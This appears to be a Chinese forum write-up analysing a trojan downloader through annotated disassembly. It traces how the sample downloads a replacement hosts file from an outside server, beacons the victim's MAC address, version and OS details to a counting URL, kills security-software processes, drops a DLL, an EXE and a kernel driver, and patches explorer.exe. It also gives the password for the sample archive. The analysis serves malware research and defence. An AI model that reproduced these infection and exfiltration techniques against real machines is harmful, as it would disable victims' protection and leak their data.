00400F1F . E8 BDFBFFFF call 00400AE1 ; cdecl helper (not shown), two args
00400F24 . 59 pop ecx
00400F25 . 59 pop ecx
00400F26 . 6A 00 push 0 ; /ShowState = SW_HIDE
00400F28 . 56 push esi ; |hWnd
00400F29 . FF15 44054000 call dword ptr [<&USER32.ShowWindow>] ; \ShowWindow
00400F2F > 6A 32 push 32 ; /Timeout = 50. ms
00400F31 . FF15 80044000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00400F37 .^ EB B9 jmp short 00400EF2 ; loop forever
线程2
004011FC |. 68 CC054000 push 004005CC ; /src = "http://ad.ittz.net:72/hosts.txt"
00401201 |. 50 push eax ; |dest
00401202 |. E8 610F0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401207 |. 83C4 20 add esp, 20
0040120A |. 8D85 ECFDFFFF lea eax, [local.133]
00401210 |. 68 1C084000 push 0040081C ; /String2 = "http://host"
00401215 |. 50 push eax ; |String1
00401216 |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA
0040121C |. 85C0 test eax, eax
0040121E |. 74 43 je short 00401263
00401220 |. 8D85 ECFEFFFF lea eax, [local.69]
00401226 |. 56 push esi ; /BufSize
00401227 |. 50 push eax ; |Buffer
00401228 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
0040122E |. 8D45 EC lea eax, [local.5]
00401231 |. 50 push eax ; /src
00401232 |. 8D85 ECFEFFFF lea eax, [local.69] ; |
00401238 |. 50 push eax ; |dest
00401239 |. E8 620F0000 call <jmp.&MSVCRT.strcat> ; \strcat
0040123E |. 8D85 ECFEFFFF lea eax, [local.69]
00401244 |. 50 push eax
00401245 |. 8D85 ECFDFFFF lea eax, [local.133]
0040124B |. 50 push eax ; "http://ad.ittz.**net:72/hosts.txt"
0040124C |. E8 D6FAFFFF call <下载文件> ; 从指定网址下载文档替换%SystemRoot%\system32\drivers\etc\hosts文件,用以屏蔽大量安全软件网址
00401251 |. 83C4 10 add esp, 10
00401254 |. 8D85 ECFEFFFF lea eax, [local.69]
0040125A |. 6A 01 push 1 ; /FileAttributes = READONLY
0040125C |. 50 push eax ; |FileName
0040125D |. FF15 5C044000 call dword ptr [<&KERNEL32.SetFileAttributes>; \SetFileAttributesA
00401263 |> 33C0 xor eax, eax
00401265 |. 5E pop esi
00401266 |. C9 leave
00401267 \. C3 retn
线程3 连接指定网站,并将用户的系统版本、网卡MAC地址等信息发送到该网站数据库中。
; ---------------------------------------------------------------------
; Thread routine 00400FFF ("thread 3"): builds a beacon URL and fetches it
; through the wininet copy loaded from %TEMP% (the slots at 402330/402344/
; 402348 are the addresses resolved by "call 2").
; Buffers: [local.132] base URL, [local.196] the "mac" value, [local.68]
; the assembled URL (0x104 bytes zeroed at ebp-110), [local.3] the 6-byte
; "?mac=" literal, [local.1] the InternetOpenA session handle.
; Request seen in the author's trace (annotation at 00401160):
;   http://Count.shxyfc.com:88/Count.asp?mac=...&ver=FM01|2011-08-25&os=...&dtime=2011-8-2
; sent with User-Agent "baidu" -- usable as a network indicator.
; The response is never read, and on success neither wininet handle is
; closed; InternetCloseHandle runs only when InternetOpenUrlA fails.
; ---------------------------------------------------------------------
00400FFF /. 55 push ebp ;
00401000 |. 8BEC mov ebp, esp
00401002 |. 81EC 10030000 sub esp, 310
00401008 |. 53 push ebx
00401009 |. 56 push esi
0040100A |. BE FF000000 mov esi, 0FF ; buffer length for the two memsets
0040100F |. 33DB xor ebx, ebx ; ebx = 0, reused as NULL/fill byte throughout
00401011 |. 56 push esi ; /n => FF (255.)
00401012 |. 8D85 F0FDFFFF lea eax, [local.132] ; | base-URL buffer
00401018 |. 53 push ebx ; |c => 00
00401019 |. 50 push eax ; |s
0040101A |. E8 43110000 call <jmp.&MSVCRT.memset> ; \memset
0040101F |. 56 push esi ; /n
00401020 |. 8D85 F0FCFFFF lea eax, [local.196] ; | "mac" value buffer
00401026 |. 53 push ebx ; |c
00401027 |. 50 push eax ; |s
00401028 |. E8 35110000 call <jmp.&MSVCRT.memset> ; \memset
0040102D |. 8D85 F0FDFFFF lea eax, [local.132]
00401033 |. 68 26064000 push 00400626 ; /src = "http://Count.shxyfc.com:88/Count.asp" -- beacon endpoint
00401038 |. 50 push eax ; |dest
00401039 |. E8 2A110000 call <jmp.&MSVCRT.strcpy> ; \strcpy
0040103E |. 83C4 20 add esp, 20 ; cdecl cleanup for the three calls above
00401041 |. 8D85 F0FDFFFF lea eax, [local.132]
00401047 |. 68 0C084000 push 0040080C ; /String2 = "http://count"
0040104C |. 50 push eax ; |String1
0040104D |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA -- NOTE(review): compares the full URL against "http://count", which can never be equal given the constant copied above; the je below is effectively dead (placeholder/kill-switch?)
00401053 |. 85C0 test eax, eax
00401055 |. 0F84 1C010000 je 00401177 ; equal -> skip everything
0040105B |. E8 AEFDFFFF call 00400E0E ; helper not shown; may be what fills the "mac" data read next -- verify
00401060 |. 8D85 F0FCFFFF lea eax, [local.196]
00401066 |. 68 A4064000 push 004006A4 ; /src = "730070000000" -- value present at 004006A4 at trace time; 12 hex digits, consistent with a MAC without separators, but the source of the value is not visible here
0040106B |. 50 push eax ; |dest
0040106C |. E8 F7100000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401071 |. 59 pop ecx
00401072 |. 59 pop ecx
00401073 |. 53 push ebx ; dwFlags = 0
00401074 |. 53 push ebx ; lpszProxyBypass = NULL
00401075 |. 53 push ebx ; lpszProxy = NULL
00401076 |. 53 push ebx ; dwAccessType = 0 (INTERNET_OPEN_TYPE_PRECONFIG)
00401077 |. 68 04084000 push 00400804 ; ASCII "baidu" -- lpszAgent: the HTTP User-Agent sent with the beacon
0040107C |. FF15 30234000 call dword ptr [402330] ; ope14F.InternetOpenA -- called through the %TEMP% copy of wininet
00401082 |. 3BC3 cmp eax, ebx
00401084 |. 8945 FC mov [local.1], eax ; session handle
00401087 |. 0F84 EA000000 je 00401177 ; InternetOpenA failed -> exit
0040108D |. 57 push edi
0040108E |. 6A 40 push 40
00401090 |. 59 pop ecx ; ecx = 0x40: zero 0x40 dwords + word + byte + the byte at ebp-110 = 0x104 bytes for the URL buffer
00401091 |. 33C0 xor eax, eax
00401093 |. 8DBD F1FEFFFF lea edi, dword ptr [ebp-10F]
00401099 |. 889D F0FEFFFF mov byte ptr [ebp-110], bl
0040109F |. F3:AB rep stos dword ptr es:[edi]
004010A1 |. 66:AB stos word ptr es:[edi]
004010A3 |. AA stos byte ptr es:[edi]
004010A4 |. BE FC074000 mov esi, 004007FC ; ASCII "?mac=" -- copied as dword+word (6 bytes incl. NUL) into [local.3]
004010A9 |. 8D7D F4 lea edi, [local.3]
004010AC |. 8D85 F0FDFFFF lea eax, [local.132]
004010B2 |. A5 movs dword ptr es:[edi], dword ptr [esi]
004010B3 |. 50 push eax ; /src = base URL
004010B4 |. 8D85 F0FEFFFF lea eax, [local.68] ; | assembled-URL buffer
004010BA |. 50 push eax ; |dest
004010BB |. 66:A5 movs word ptr es:[edi], word ptr [esi] ; |
004010BD |. E8 A6100000 call <jmp.&MSVCRT.strcpy> ; \strcpy -- url = base
004010C2 |. 8D45 F4 lea eax, [local.3]
004010C5 |. 50 push eax ; //src = "?mac="
004010C6 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010CC |. 50 push eax ; |dest
004010CD |. E8 CE100000 call <jmp.&MSVCRT.strcat> ; \strcat -- url += "?mac="
004010D2 |. 8D85 F0FCFFFF lea eax, [local.196]
004010D8 |. 50 push eax ; /src = the "mac" value
004010D9 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010DF |. 50 push eax ; |dest
004010E0 |. E8 BB100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010E5 |. 8D85 F0FEFFFF lea eax, [local.68]
004010EB |. 68 F4074000 push 004007F4 ; /src = "&ver="
004010F0 |. 50 push eax ; |dest
004010F1 |. E8 AA100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010F6 |. 8D85 F0FEFFFF lea eax, [local.68]
004010FC |. 68 80064000 push 00400680 ; /src = "FM01|2011-08-25" -- build/version tag of the sample
00401101 |. 50 push eax ; |dest
00401102 |. E8 99100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401107 |. 8D85 F0FEFFFF lea eax, [local.68]
0040110D |. 68 EC074000 push 004007EC ; /src = "&os="
00401112 |. 50 push eax ; |dest
00401113 |. E8 88100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401118 |. E8 A5FEFFFF call 00400FC2 ; \GetVersionExA -- wrapper not shown; returns a string pointer (the os= field is empty in the author's trace)
0040111D |. 50 push eax ; /src = OS string
0040111E |. 8D85 F0FEFFFF lea eax, [local.68] ; |
00401124 |. 50 push eax ; |dest
00401125 |. E8 76100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040112A |. 8D85 F0FEFFFF lea eax, [local.68]
00401130 |. 68 E4074000 push 004007E4 ; /src = "&dtime="
00401135 |. 50 push eax ; |dest
00401136 |. E8 65100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040113B |. 83C4 40 add esp, 40 ; cdecl cleanup for the eight 2-arg calls above
0040113E |. 8D85 F0FEFFFF lea eax, [local.68]
00401144 |. 68 94064000 push 00400694 ; /src = "2011-8-2" -- hard-coded, not the current date
00401149 |. 50 push eax ; |dest
0040114A |. E8 51100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040114F |. 59 pop ecx
00401150 |. 8D85 F0FEFFFF lea eax, [local.68]
00401156 |. 59 pop ecx
00401157 |. 53 push ebx ; dwContext = 0
00401158 |. 68 00000080 push 80000000 ; dwFlags = INTERNET_FLAG_RELOAD (bypass cache)
0040115D |. 53 push ebx ; dwHeadersLength = 0
0040115E |. 53 push ebx ; lpszHeaders = NULL
0040115F |. 50 push eax ; lpszUrl = assembled URL
00401160 |. FF75 FC push [local.1] ; 01D6FC84 01D6FEA4 ASCII "http://Count.shxyfc.com:88/Count.asp?mac=730070000000&ver=FM01|2011-08-25&os=&dtime=2011-8-2" -- hInternet
00401163 |. FF15 44234000 call dword ptr [402344] ; ope14F.InternetOpenUrlA 发送信息了 -- (author: the information is sent here); the GET itself is the beacon, the response is never read
00401169 |. 85C0 test eax, eax
0040116B |. 5F pop edi
0040116C |. 75 09 jnz short 00401177 ; success -> return without closing either handle
0040116E |. FF75 FC push [local.1]
00401171 |. FF15 48234000 call dword ptr [402348] ; ope14F.InternetCloseHandle -- only on failure
00401177 |> 5E pop esi
00401178 |. 33C0 xor eax, eax ; thread returns 0
0040117A |. 5B pop ebx
0040117B |. C9 leave
0040117C \. C3 retn
驱动文件的分析可参考这个帖子:http://bbs.pediy.com/showthread.php?t=90248
.text:00012178
.text:00012178 loc_12178: ; CODE XREF: start+32j
.text:00012178 mov DestinationString.MaximumLength, bx
.text:0001217F mov DestinationString.Length, bx
.text:00012186
.text:00012186 loc_12186: ; CODE XREF: start+40j
.text:00012186 mov esi, [ebp+DriverObject]
.text:00012189 mov edi, ds:RtlInitUnicodeString
.text:0001218F mov eax, offset sub_104CC
.text:00012194 mov [esi+38h], eax
.text:00012197 mov [esi+40h], eax
.text:0001219A push offset SourceString ; SourceString
.text:0001219F lea eax, [ebp+DestinationString]
.text:000121A2 push eax ; DestinationString
.text:000121A3 mov dword ptr [esi+70h], offset sub_11C60
.text:000121AA call edi ; RtlInitUnicodeString
.text:000121AC lea eax, [ebp+DeviceObject]
.text:000121AF push eax ; DeviceObject
.text:000121B0 push ebx ; Exclusive
.text:000121B1 push 100h ; DeviceCharacteristics
.text:000121B6 push 22h ; DeviceType
.text:000121B8 lea eax, [ebp+DestinationString]
.text:000121BB push eax ; DeviceName
.text:000121BC push 208h ; DeviceExtensionSize
.text:000121C1 push esi ; DriverObject
.text:000121C2 call ds:IoCreateDevice
.text:000121C8 mov esi, eax
.text:000121CA cmp esi, ebx
.text:000121CC jl short loc_121F6
.text:000121CE push offset word_1210E ; SourceString
.text:000121D3 lea eax, [ebp+SymbolicLinkName]
.text:000121D6 push eax ; DestinationString
.text:000121D7 call edi ; RtlInitUnicodeString
.text:000121D9 lea eax, [ebp+DestinationString]
.text:000121DC push eax ; DeviceName
.text:000121DD lea eax, [ebp+SymbolicLinkName]
.text:000121E0 push eax ; SymbolicLinkName
.text:000121E1 call ds:IoCreateSymbolicLink
.text:000121E7 mov esi, eax
.text:000121E9 cmp esi, ebx
.text:000121EB jge short loc_12209
.text:000121ED push [ebp+DeviceObject] ; DeviceObject
.text:000121F0 call ds:IoDeleteDevice
.text:000121F6
.text:000121F6 loc_121F6: ; CODE XREF: start+96j
.text:000121F6 mov eax, DestinationString.Buffer
.text:000121FB cmp eax, ebx
.text:000121FD jz short loc_12242
.text:000121FF push ebx ; Tag
.text:00012200 push eax ; P
.text:00012201 call ds:ExFreePoolWithTag
.text:00012207 jmp short loc_12242
大体流程分析完了,有兴趣的同学可以下载后自行分析。
解压密码virus
1、创建一个互斥体(名称为TGmae,见下文004022D3处的注释)
2、停止ekrn服务,结束ekrn.exe,egui.exe进程。
3、释放动态库文件 "C:\WINDOWS\system32\44810500.dll",结束大量安全软件进程,劫持安全软件。
4、调用GetTickCount函数,根据开机时间生成一个EXE文件到WINDOWS目录(我的机器为:C:\WINDOWS\45757859.exe;下文主体分析0040251F处的注释显示该路径由GetSystemDirectoryA拼接,为C:\WINDOWS\system32\45757859.exe),45757859.exe是一个木马下载者
5、释放驱动文件pcidump.sys,创建服务启动驱动,修改gm.dls和explorer.exe,删除驱动文件
备注:分别创建 44810500.dll、pcidump.sys、45757859.exe主要文件
主体分析:
00402230 . 81EC 680B0000 sub esp, 0B68 ; (Initial CPU selection)
00402236 . 53 push ebx
00402237 . 55 push ebp
00402238 . 56 push esi
00402239 . 57 push edi
0040223A . B9 3F000000 mov ecx, 3F
0040223F . 33C0 xor eax, eax
00402241 . 8DBC24 74050000 lea edi, dword ptr [esp+574]
00402248 . 68 E0134000 push 004013E0 ; /TGmae...
0040224D . F3:AB rep stos dword ptr es:[edi] ; |
0040224F . 66:AB stos word ptr es:[edi] ; |
00402251 . AA stos byte ptr es:[edi] ; |
00402252 . B9 3F000000 mov ecx, 3F ; |
00402257 . 33C0 xor eax, eax ; |
00402259 . 8DBC24 78070000 lea edi, dword ptr [esp+778] ; |
00402260 . B3 5C mov bl, 5C ; |
00402262 . F3:AB rep stos dword ptr es:[edi] ; |
00402264 . 66:AB stos word ptr es:[edi] ; |
00402266 . AA stos byte ptr es:[edi] ; |
00402267 . B9 3F000000 mov ecx, 3F ; |
0040226C . 33C0 xor eax, eax ; |
0040226E . 8DBC24 78060000 lea edi, dword ptr [esp+678] ; |
00402275 . 6A 00 push 0 ; |InitialOwner = FALSE
00402277 . F3:AB rep stos dword ptr es:[edi] ; |
00402279 . 66:AB stos word ptr es:[edi] ; |
0040227B . AA stos byte ptr es:[edi] ; |
0040227C . B9 3F000000 mov ecx, 3F ; |
00402281 . 33C0 xor eax, eax ; |
00402283 . 8D7C24 78 lea edi, dword ptr [esp+78] ; |
00402287 . 6A 00 push 0 ; |pSecurity = NULL
00402289 . F3:AB rep stos dword ptr es:[edi] ; |
0040228B . 66:AB stos word ptr es:[edi] ; |
0040228D . 885C24 24 mov byte ptr [esp+24], bl ; |输入\Explorer.EXE
00402291 . C64424 25 45 mov byte ptr [esp+25], 45 ; |
00402296 . C64424 26 78 mov byte ptr [esp+26], 78 ; |
0040229B . C64424 27 70 mov byte ptr [esp+27], 70 ; |
004022A0 . C64424 28 6C mov byte ptr [esp+28], 6C ; |
004022A5 . C64424 29 6F mov byte ptr [esp+29], 6F ; |
004022AA . C64424 2A 72 mov byte ptr [esp+2A], 72 ; |
004022AF . C64424 2B 65 mov byte ptr [esp+2B], 65 ; |
004022B4 . C64424 2C 72 mov byte ptr [esp+2C], 72 ; |
004022B9 . C64424 2D 2E mov byte ptr [esp+2D], 2E ; |
004022BE . C64424 2E 45 mov byte ptr [esp+2E], 45 ; |
004022C3 . C64424 2F 58 mov byte ptr [esp+2F], 58 ; |
004022C8 . C64424 30 45 mov byte ptr [esp+30], 45 ; |
004022CD . C64424 31 00 mov byte ptr [esp+31], 0 ; |
004022D2 . AA stos byte ptr es:[edi] ; |
004022D3 . FF15 84104000 call dword ptr [401084] ; \CreateMutexA 创建一个TGmae的互斥体,防止多次运行
004022D9 . FF15 80104000 call dword ptr [401080] ; ntdll.RtlGetLastWin32Error
004022DF . 3D B7000000 cmp eax, 0B7
004022E4 . 75 08 jnz short 004022EE
004022E6 . 6A 00 push 0 ; /ExitCode = 0
004022E8 . FF15 54104000 call dword ptr [401054] ; \ExitProcess
004022EE > 8B35 7C104000 mov esi, dword ptr [40107C] ; kernel32.GetWindowsDirectoryA
004022F4 . 8D8424 74060000 lea eax, dword ptr [esp+674]
004022FB . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402300 . 50 push eax ; |Buffer
00402301 . FFD6 call esi ; \GetWindowsDirectoryA
00402303 . 8D8C24 74050000 lea ecx, dword ptr [esp+574]
0040230A . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040230F . 51 push ecx ; |Buffer
00402310 . FFD6 call esi ; \GetWindowsDirectoryA
00402312 . 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00402318 . 8D5424 18 lea edx, dword ptr [esp+18]
0040231C . 8D8424 74050000 lea eax, dword ptr [esp+574]
00402323 . 52 push edx ; /StringToAdd
00402324 . 50 push eax ; |ConcatString
00402325 . FFD6 call esi ; \lstrcatA
00402327 . 8D8C24 74070000 lea ecx, dword ptr [esp+774] ; 连接字符串C:\WINDOWS\Explorer.EXE
0040232E . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402333 . 51 push ecx ; |Buffer
00402334 . 885C24 4C mov byte ptr [esp+4C], bl ; |
00402338 . C64424 4D 74 mov byte ptr [esp+4D], 74 ; |
0040233D . C64424 4E 65 mov byte ptr [esp+4E], 65 ; |
00402342 . C64424 4F 6D mov byte ptr [esp+4F], 6D ; |
00402347 . C64424 50 70 mov byte ptr [esp+50], 70 ; |
0040234C . 885C24 51 mov byte ptr [esp+51], bl ; |
00402350 . C64424 52 45 mov byte ptr [esp+52], 45 ; |
00402355 . C64424 53 78 mov byte ptr [esp+53], 78 ; |
0040235A . C64424 54 70 mov byte ptr [esp+54], 70 ; |
0040235F . C64424 55 6C mov byte ptr [esp+55], 6C ; |
00402364 . C64424 56 6F mov byte ptr [esp+56], 6F ; |
00402369 . C64424 57 72 mov byte ptr [esp+57], 72 ; |
0040236E . C64424 58 65 mov byte ptr [esp+58], 65 ; |
00402373 . C64424 59 72 mov byte ptr [esp+59], 72 ; |
00402378 . C64424 5A 2E mov byte ptr [esp+5A], 2E ; |
0040237D . C64424 5B 65 mov byte ptr [esp+5B], 65 ; |
00402382 . C64424 5C 78 mov byte ptr [esp+5C], 78 ; |
00402387 . C64424 5D 65 mov byte ptr [esp+5D], 65 ; |
0040238C . C64424 5E 00 mov byte ptr [esp+5E], 0 ; |
00402391 . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00402397 . 8D5424 70 lea edx, dword ptr [esp+70]
0040239B . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004023A0 . 52 push edx ; |PathBuffer
004023A1 . 6A 00 push 0 ; |hModule = NULL
004023A3 . 885C24 40 mov byte ptr [esp+40], bl ; |输入\drivers\gm.dls
004023A7 . C64424 41 64 mov byte ptr [esp+41], 64 ; |
004023AC . C64424 42 72 mov byte ptr [esp+42], 72 ; |
004023B1 . C64424 43 69 mov byte ptr [esp+43], 69 ; |
004023B6 . C64424 44 76 mov byte ptr [esp+44], 76 ; |
004023BB . C64424 45 65 mov byte ptr [esp+45], 65 ; |
004023C0 . C64424 46 72 mov byte ptr [esp+46], 72 ; |
004023C5 . C64424 47 73 mov byte ptr [esp+47], 73 ; |
004023CA . 885C24 48 mov byte ptr [esp+48], bl ; |
004023CE . C64424 49 67 mov byte ptr [esp+49], 67 ; |
004023D3 . C64424 4A 6D mov byte ptr [esp+4A], 6D ; |
004023D8 . C64424 4B 2E mov byte ptr [esp+4B], 2E ; |
004023DD . C64424 4C 64 mov byte ptr [esp+4C], 64 ; |
004023E2 . C64424 4D 6C mov byte ptr [esp+4D], 6C ; |
004023E7 . C64424 4E 73 mov byte ptr [esp+4E], 73 ; |
004023EC . C64424 4F 00 mov byte ptr [esp+4F], 0 ; |
004023F1 . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
004023F7 . 8D8424 74050000 lea eax, dword ptr [esp+574] ; C:\trojan\trojan\412489_fm01.exe
004023FE . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402402 . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
00402403 . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
00402404 . FF15 48104000 call dword ptr [401048] ; \lstrcmpiA
0040240A . 85C0 test eax, eax
0040240C . 75 5B jnz short 00402469 ; 判断当前进程是不是explorer.exe,是继续,不是跳转
0040240E . A2 78124000 mov byte ptr [401278], al ; 此时al=0,写入全局标志[401278];关键call 3在004016EF处读取该标志,为0时跳过第一次DeviceIoControl
00402413 . 8D5424 44 lea edx, dword ptr [esp+44]
00402417 . 8D8424 74060000 lea eax, dword ptr [esp+674]
0040241E . 52 push edx ; /StringToAdd
0040241F . 50 push eax ; |ConcatString
00402420 . FFD6 call esi ; \lstrcatA
00402422 . 8D4C24 34 lea ecx, dword ptr [esp+34] ; 上一步lstrcatA连接得到C:\WINDOWS\temp\Explorer.exe(位于[esp+674])
00402426 . 8D9424 74070000 lea edx, dword ptr [esp+774]
0040242D . 51 push ecx ; /StringToAdd
0040242E . 52 push edx ; |ConcatString
0040242F . FFD6 call esi ; \lstrcatA
00402431 . 8D8424 74060000 lea eax, dword ptr [esp+674] ; 上一步lstrcatA连接得到C:\WINDOWS\system32\drivers\gm.dls(位于[esp+774])
00402438 . 6A 00 push 0 ; /FailIfExists = FALSE
0040243A . 8D8C24 78070000 lea ecx, dword ptr [esp+778] ; |
00402441 . 50 push eax ; |NewFileName
00402442 . 51 push ecx ; |ExistingFileName
00402443 . FF15 78104000 call dword ptr [401078] ; \CopyFileA
00402449 . 6A 00 push 0 ; 复制C:\WINDOWS\system32\drivers\gm.dls为 C:\WINDOWS\temp\Explorer.exe
0040244B . 6A 00 push 0
0040244D . 8D9424 7C060000 lea edx, dword ptr [esp+67C]
00402454 . 68 E4104000 push 004010E4
00402459 . 52 push edx
0040245A . 68 C8124000 push 004012C8 ; open
0040245F . 6A 00 push 0
00402461 . E8 DAEFFFFF call <动态获得函数地址并运行文件>
00402466 . 83C4 18 add esp, 18
00402469 > E8 D2F9FFFF call <设置权限>
0040246E . 6A 00 push 0 ; /pThreadId = NULL
00402470 . 6A 00 push 0 ; |CreationFlags = 0
00402472 . 6A 00 push 0 ; |pThreadParm = NULL
00402474 . 68 20224000 push 00402220 ; |ThreadFunction = 412489_f.00402220
00402479 . 6A 00 push 0 ; |StackSize = 0
0040247B . 6A 00 push 0 ; |pSecurity = NULL
0040247D . FF15 74104000 call dword ptr [401074] ; \CreateThread
00402483 . 8B2D 9C104000 mov ebp, dword ptr [40109C] ; kernel32.Sleep
00402489 . 68 88130000 push 1388 ; /Timeout = 5000. ms
0040248E . FFD5 call ebp ; \Sleep
00402490 . E8 DBF4FFFF call 00401970 ; 关键call 1 关闭指定进程
00402495 . 68 E8030000 push 3E8
0040249A . FFD5 call ebp ; kernel32.Sleep
0040249C . E8 3FF8FFFF call 00401CE0 ; 关键call 2 释放动态链接库C:\WINDOWS\system32\44810500.dll(下文关键call 2的代码用GetTempPathA拼接路径,调试时实际为C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll),创建进程,调用C:\WINDOWS\system32\rundll32.exe加载 44810500.dll
004024A1 . 68 E8030000 push 3E8
004024A6 . FFD5 call ebp ; kernel32.Sleep
004024A8 . B9 3F000000 mov ecx, 3F
004024AD . 33C0 xor eax, eax
004024AF . 8DBC24 70030000 lea edi, dword ptr [esp+370]
004024B6 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004024BB . F3:AB rep stos dword ptr es:[edi] ; |
004024BD . 66:AB stos word ptr es:[edi] ; |
004024BF . AA stos byte ptr es:[edi] ; |
004024C0 . B9 3F000000 mov ecx, 3F ; |
004024C5 . 33C0 xor eax, eax ; |
004024C7 . 8DBC24 78090000 lea edi, dword ptr [esp+978] ; |
004024CE . F3:AB rep stos dword ptr es:[edi] ; |
004024D0 . 66:AB stos word ptr es:[edi] ; |
004024D2 . AA stos byte ptr es:[edi] ; |
004024D3 . 8D8424 74030000 lea eax, dword ptr [esp+374] ; |
004024DA . 50 push eax ; |Buffer
004024DB . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
004024E1 . FF15 68104000 call dword ptr [401068] ; [GetTickCount
004024E7 . 50 push eax ; /<%d>
004024E8 . 8D8C24 78090000 lea ecx, dword ptr [esp+978] ; |
004024EF . 68 D8134000 push 004013D8 ; |%d.exe
004024F4 . 51 push ecx ; |s
004024F5 . FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
004024FB . 83C4 0C add esp, 0C
004024FE . 8D9424 70030000 lea edx, dword ptr [esp+370]
00402505 . 68 D4134000 push 004013D4 ; \
0040250A . 52 push edx
0040250B . FFD6 call esi ; kernel32.lstrcatA
0040250D . 8D8424 74090000 lea eax, dword ptr [esp+974]
00402514 . 8D8C24 70030000 lea ecx, dword ptr [esp+370]
0040251B . 50 push eax
0040251C . 51 push ecx
0040251D . FFD6 call esi ; kernel32.lstrcatA
0040251F . 8D9424 70030000 lea edx, dword ptr [esp+370] ; C:\WINDOWS\system32\45757859.exe
00402526 . 6A 65 push 65
00402528 . 52 push edx
00402529 . E8 02F3FFFF call <创建文件> ; 创建文件C:\WINDOWS\system32\45757859.exe(路径由GetSystemDirectoryA的结果加上用GetTickCount按"%d.exe"生成的文件名拼接而成)
0040252E . 6A 00 push 0
00402530 . 6A 00 push 0
00402532 . 8D8424 78030000 lea eax, dword ptr [esp+378]
00402539 . 68 E4104000 push 004010E4
0040253E . 50 push eax
0040253F . 68 C8124000 push 004012C8 ; open
00402544 . 6A 00 push 0
00402546 . E8 F5EEFFFF call <动态获得函数地址并运行文件>
0040254B . 83C4 18 add esp, 18
0040254E . 68 E8030000 push 3E8
00402553 . FFD5 call ebp
00402555 . 885C24 58 mov byte ptr [esp+58], bl ; \drivers\pcidump
00402559 . C64424 59 64 mov byte ptr [esp+59], 64
0040255E . C64424 5A 72 mov byte ptr [esp+5A], 72
00402563 . C64424 5B 69 mov byte ptr [esp+5B], 69
00402568 . C64424 5C 76 mov byte ptr [esp+5C], 76
0040256D . C64424 5D 65 mov byte ptr [esp+5D], 65
00402572 . C64424 5E 72 mov byte ptr [esp+5E], 72
00402577 . C64424 5F 73 mov byte ptr [esp+5F], 73
0040257C . 885C24 60 mov byte ptr [esp+60], bl
00402580 . C64424 61 70 mov byte ptr [esp+61], 70
00402585 . C64424 62 63 mov byte ptr [esp+62], 63
0040258A . C64424 63 69 mov byte ptr [esp+63], 69
0040258F . C64424 64 64 mov byte ptr [esp+64], 64
00402594 . C64424 65 75 mov byte ptr [esp+65], 75
00402599 . C64424 66 6D mov byte ptr [esp+66], 6D
0040259E . C64424 67 70 mov byte ptr [esp+67], 70
004025A3 . C64424 68 2E mov byte ptr [esp+68], 2E
004025A8 . B9 3F000000 mov ecx, 3F
004025AD . 33C0 xor eax, eax
004025AF . 8D7C24 70 lea edi, dword ptr [esp+70]
004025B3 . 885C24 10 mov byte ptr [esp+10], bl
004025B7 . F3:AB rep stos dword ptr es:[edi]
004025B9 . 66:AB stos word ptr es:[edi]
004025BB . AA stos byte ptr es:[edi]
004025BC . B9 3F000000 mov ecx, 3F
004025C1 . 33C0 xor eax, eax
004025C3 . 8DBC24 74040000 lea edi, dword ptr [esp+474]
004025CA . 885C24 13 mov byte ptr [esp+13], bl
004025CE . F3:AB rep stos dword ptr es:[edi]
004025D0 . 66:AB stos word ptr es:[edi]
004025D2 . AA stos byte ptr es:[edi]
004025D3 . B9 3F000000 mov ecx, 3F
004025D8 . 33C0 xor eax, eax
004025DA . 8DBC24 74080000 lea edi, dword ptr [esp+874]
004025E1 . 8B1D 90104000 mov ebx, dword ptr [401090] ; kernel32.GetSystemDirectoryA
004025E7 . F3:AB rep stos dword ptr es:[edi]
004025E9 . 66:AB stos word ptr es:[edi]
004025EB . AA stos byte ptr es:[edi]
004025EC . B9 3F000000 mov ecx, 3F
004025F1 . 33C0 xor eax, eax
004025F3 . 8DBC24 70020000 lea edi, dword ptr [esp+270]
004025FA . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004025FF . F3:AB rep stos dword ptr es:[edi] ; |
00402601 . 66:AB stos word ptr es:[edi] ; |
00402603 . 8D8C24 74020000 lea ecx, dword ptr [esp+274] ; |
0040260A . C64424 6D 73 mov byte ptr [esp+6D], 73 ; |
0040260F . 51 push ecx ; |Buffer
00402610 . C64424 72 79 mov byte ptr [esp+72], 79 ; |
00402615 . C64424 73 73 mov byte ptr [esp+73], 73 ; |
0040261A . C64424 74 00 mov byte ptr [esp+74], 0 ; |
0040261F . C64424 19 3F mov byte ptr [esp+19], 3F ; |
00402624 . C64424 1A 3F mov byte ptr [esp+1A], 3F ; |
00402629 . C64424 1C 00 mov byte ptr [esp+1C], 0 ; |
0040262E . AA stos byte ptr es:[edi] ; |
0040262F . FFD3 call ebx ; \GetSystemDirectoryA
00402631 . 8D5424 58 lea edx, dword ptr [esp+58]
